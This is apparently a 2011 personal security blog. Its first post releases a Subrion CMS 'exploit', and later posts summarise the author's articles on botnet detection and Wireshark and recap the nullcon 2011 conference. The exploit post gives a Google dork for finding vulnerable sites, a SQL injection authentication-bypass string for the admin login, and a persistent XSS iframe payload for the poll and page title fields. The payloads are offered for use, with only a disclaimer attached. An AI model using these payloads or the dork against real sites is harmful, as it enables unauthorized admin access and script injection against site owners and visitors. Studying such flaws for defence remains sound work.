3ps!l0nLaMbDa

Hi folks,

Releasing my first exploit today about Subrion CMS multiple vulnerabilities. You can check-in exploit-db, inj3ct0r and packetstormsecurity too for the exploit. Here, I am posting my first exploit for you to go through.

Disclaimer: The author isn’t responsible for any misuse of this exploit. This is posted here for a conceptual understanding of multiple vulnerabilities that can occur within a single site. Hack to learn, but dont learn to hack.

Peace \m/

Here’s the 3xpl0it:

SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com
Author: Karthik R (3psil0nLambDa)
Email:  Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork:  © 2011 Powered by Subrion CMS 

Description about the CMS

Subrion CMS unites the functionality of articles script, auto 
classifieds script,realty classifieds script, and web directory
script all in one package. Subrion's highly scalable set of key
features makes it a powerful platform for web sites. Subrion CMS
is easy to install and simple to manage. Use it as a stand-alone
application or in conjunction with other applications to create 
entry level sites, mid-sized or large sites. You can be confident
that you will be able to invest in this system and continue to
grow it to any possible level.
Exploits:
SQLi Vulnerability

The attackers can use the authentication bypass to get in to the
admin panel in the site.

Exploit: Username: ' or 0=0 #
	 Password: ' or 0=0 #
Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS
in the title field.
Exploit: 
%22%3E%3CIFRAME SRC="javascript:alert('XSS');%22%3E%3C/IFRAME%3E
----------------------------------------------------------
Greets and tribute to: side^effects and my love taashu
----------------------------------------------------------
This can be further extended depending on your arsenal.
Until next time, 3ps!l0nLaMbDa signing off. \m/
 

Recently, my 3rd article got published in a security portal – searchsecurity.techtarget.in.

An overview:

It’s essential to know the difference between a bot and botnet before you can identify suitable botnet detection techniques and tools. While an autonomous program automatically performing tasks in the absence of a real user is known as a bot, a network of autonomous programs capable of acting on instructions is known as botnet. A few examplesof botnets include: Storm, Kraken, Conficker and Zeus, among others.

As botnets continue to gain momentum in the form of spam bots, click fraud, large-scale identity thefts and proxy nets and a large-scale distributed denial of service (DDoS) attacks, it’s proving to be a challenge to defend against these intrusive autonomous programs. Generally, a botnet may display following behavior patterns like signature-based, anomaly-based, DNS-based and mining-based. This tip discusses how to effectively use various botnet detection techniques and tools.

For the full article : Kindly click on the link below

http://searchsecurity.techtarget.in/tip/Four-handy-botnet-detection-techniques-and-tools-A-tutorial

Thank You

3ps!l0nlAmBdA

Hi again,

Just got an email from anil of techtarget.com, informing me about my article being published in their online magazine. Interested people can please look into it. The link to the article is here: http://searchsecurity.techtarget.in/tutorial/Quick-and-dirty-Wireshark-tutorial

Thanks to Tamaghna, for informing about this opportunity and also the null community. I am thankful to Mr. Anil Patrick of techtarget, for publishing my article.

Keep reading this blog, for more…

Cheers

3ps!l0nLaMbDa

Hey folks,

I had a great time attending nullcon 2011, 2 days of sheer fun, knowledge and networking. Met a lot of people, got to know them personally, especially those whom I had met only through IRC’s.  A nice ambience at “The retreat” Zuri, beach resort, which come in utor doxi, pedda, varca, salcette.

The food was great, the t-shirt even better and finally the CPE which we got, at the end of the 2nd day, all added to those small gains I had which can turn into big ones. Will be indebted to basu bhai, who helped us a lot, and in all it was gr8 experience. Here’s an article I am presenting to you which ll give you a glimpse of nullcon..A lot more to be covered, but, currently, only so much.

Nullcon(http://nullcon.net) Dwitiya witnessed action worth following—whether it is the Desi Jugaad track on Hacking the Parliament or demystifying the Zeus man in the middle attack on cell phones. Get into the thick of all the action at nullcon Day Zero with our vignette series.

In its second year, nullcon 2011 is now an international security conference that witnesses the participation of India’s top whitehat hackers. Organized by the null information security community, nullcon 2011 is being held at The RETREAT by Zuri, Goa. With twin parallel tracks that cover various aspects such as technical tracks, security trend debates, research papers and CXO sessions , this is an event that sees participation from hackers— desi as well as international.

With tracks like Desi Jugaad which includes India-specific hacks, the event promises insights worth exploring for the security enthusiast as well, rather than just pure-play infosec. As part of our detailed nullcon Dwitiya coverage, we have put together some of the hottest topics of Day Zero. These presentations examine some of the hottest challenges—right from exploiting SCADA systems and building intelligence analysis systems to reversing Microsoft patches for analysis of vulnerable code. Here are some of the highlights of nullcon 2011’s Day Zero.

Session: Exploiting SCADA systems

Presenter: Jeremy Brown

During this session of nullcon 2011, Jeremy Brown of Tenable Network Security lays bare the vulnerabilities that surround SCADA software as well as the vendor apathy which makes these systems so vulnerable. Brown also conducts the demo of a live SCADA system exploit as part of this session. With threats like Stuxnet highlighting the need for secure SCADA systems, this is one presentation that you cannot afford to mix.

Paper: Reversing Microsoft patches to reveal vulnerable code

Presenter: Harsimran Walia

Application Developer Harsimran Walia’s paper details identification of vulnerable code files in Microsoft solutions through reverse engineering of patches and files for these products. The paper puts forward the need to leverage this process for creation of vulnerability signatures, an approach which is superior to the use of exploit signatures for making undisclosed exploit and patch verification.

Workshop: Building an intelligence analysis systems using open source tools

Presenter: Fyodor Yarochkin

As part of this nullcon 2011 workshop, security analyst Fyodor Yarochkin from Armorize Technologies exhibits how open source tools can be used to mine Internet data, organize and tag it for extraction of meaningful information. This hands-on workshop examines how intelligence analysis systems can be built using various open source solutions such as Nutch, solr, lucene, Soghun (machine learning framework), hadoop and netglub.

(Article courtesy: http://searchsecurity.techtarget.in)

Cheers

3ps!l0nLaMbDa